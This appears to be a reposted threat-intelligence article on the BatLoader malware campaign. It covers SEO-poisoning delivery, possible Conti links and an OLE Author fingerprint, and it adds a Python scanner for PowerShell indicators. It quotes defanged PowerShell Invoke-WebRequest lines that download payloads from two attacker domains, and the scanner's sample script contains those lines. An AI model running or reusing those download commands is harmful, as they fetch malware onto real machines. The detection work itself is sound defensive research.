singaporegre.blogg.se

Downloader




Contributors: Deborah Snyder and Nikki Benoit

Executive Summary

VMware Carbon Black Managed Detection and Response (MDR) analysts are constantly handling security incidents within our customer environments and tracking emerging and persistent malware campaigns. One such threat that has been particularly prevalent over the last couple of months is BatLoader. Named by Mandiant, BatLoader is an initial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and deliver other malware. The threat actors use search engine optimization (SEO) poisoning to lure users into downloading the malware from compromised websites. The use of living-off-the-land binaries makes this campaign hard to detect and block, especially early in the attack chain. In this article, we will explore this malware campaign, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black's detection of the malware.

While researching BatLoader, the team discovered several attributes within the attack chain that are similar to previous activity linked to Conti. Evidence collected includes an IP address and host name (printed in this copy as 1340117195 and firsone1online; the separating dots were lost in extraction) that were previously used by Conti in a ransomware campaign leveraging Log4j, as well as techniques that Conti has used in other attacks. One of the techniques identified was the use of the Atera remote-management agent, which resembles Conti's earlier tooling in its ransomware operations. Mandiant had previously released research on BatLoader and commented that BatLoader activity overlaps with techniques that appeared in the Conti leaks of August 2021. This is not to say that Conti is responsible for BatLoader.

There are several attributes that are unique to BatLoader's attack methodology that Carbon Black's MDR team has seen in infected customer environments. The following can be used as a fingerprint to identify the malicious files (based on the OLE file information provided by VirusTotal):

Table 1: OLE file information for identified BatLoader samples
Author: Kancelaria Adwokacka Adwokat Aleksandra Krzemińska

Note that the Author field is attacker-controlled document metadata and can be changed at any time, so it is a campaign-specific, low-confidence indicator rather than a durable detection.

Other fingerprints pulled from the code can also be used to identify BatLoader files (URLs defanged):

Invoke-WebRequest hxxp://cloudupdatesss[.]com
Invoke-WebRequest hxxps://updatea1[.]com/g5
Set-Location "$Env:USERPROFILE\AppData\Roaming"
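The fingerprints above can be turned into a small hunting check. The following is an added example written for this page, not code from the Carbon Black article or from VMware: it refangs report-style indicators (hxxp, [.]), looks for Invoke-WebRequest calls to the two listed domains and for the Set-Location into AppData\Roaming, and compares an OLE Author field against Table 1. Tolerating an explicit -Uri parameter and the hxxtps spelling is an assumption of the scanner, not something the article shows, and the two PowerShell snippets at the bottom are constructed samples, not real BatLoader scripts.

```python
import re

# Indicators taken from the fingerprints listed above. The article gives the
# URLs defanged; they are stored refanged here so the scanner can compare
# against live script content.
BATLOADER_DOMAINS = ("cloudupdatesss.com", "updatea1.com")
BATLOADER_OLE_AUTHOR = "Kancelaria Adwokacka Adwokat Aleksandra Krzemińska"

_IWR_RE = re.compile(
    # Invoke-WebRequest, optionally with -Uri, then a bare or quoted URL.
    # Accepting -Uri is an assumption; the article shows only the bare form.
    r"Invoke-WebRequest\s+(?:-Uri\s+)?[\"']?(https?://[^\s\"']+)",
    re.IGNORECASE,
)
_CD_ROAMING_RE = re.compile(
    r"Set-Location\s+[\"']?\$Env:USERPROFILE\\AppData\\Roaming",
    re.IGNORECASE,
)


def refang(text: str) -> str:
    """Undo common defanging (hxxp://, hxxtps://, [.]) so indicators copied
    from a report match the same content as written in a live script."""
    text = re.sub(r"(?i)hxxt?(ps?://)", r"htt\1", text)
    return text.replace("[.]", ".").replace("(.)", ".")


def scan_powershell(script: str) -> dict:
    """Report which BatLoader script fingerprints a PowerShell body contains."""
    body = refang(script)
    urls = _IWR_RE.findall(body)
    bad_urls = [u for u in urls if any(d in u.lower() for d in BATLOADER_DOMAINS)]
    cd_roaming = _CD_ROAMING_RE.search(body) is not None
    return {
        "download_urls": bad_urls,
        "cd_roaming": cd_roaming,
        # Flag only when both fingerprints co-occur: a lone Set-Location into
        # Roaming is common in legitimate installers and would be noisy alone.
        "suspicious": bool(bad_urls) and cd_roaming,
    }


def ole_author_matches(meta: dict) -> bool:
    """Compare the OLE summary-information Author field (as VirusTotal's file
    details or the oletools olemeta utility report it) against Table 1.
    Author is attacker-controlled metadata, so a hit is a campaign-specific,
    low-confidence signal, not proof on its own."""
    author = (meta.get("author") or "").strip()
    return author.casefold() == BATLOADER_OLE_AUTHOR.casefold()


# Constructed samples modelled on the fingerprint lines above; they are not
# real BatLoader scripts.
SAMPLE_SCRIPT = r'''
Set-Location "$Env:USERPROFILE\AppData\Roaming"
Invoke-WebRequest hxxps://updatea1[.]com/g5 -OutFile g5.bat
Invoke-WebRequest hxxp://cloudupdatesss[.]com -OutFile up.bat
'''

BENIGN_SCRIPT = r'''
Set-Location "$Env:USERPROFILE\Documents"
Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip
'''

if __name__ == "__main__":
    print(scan_powershell(SAMPLE_SCRIPT))
    print(scan_powershell(BENIGN_SCRIPT))
    print(ole_author_matches({"author": BATLOADER_OLE_AUTHOR}))
```

Run it against script bodies pulled from process command lines or from files dropped under AppData\Roaming; the domain list and the Author string are the parts to update as new samples are reported, and the co-occurrence requirement is what keeps the check from firing on ordinary installers.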





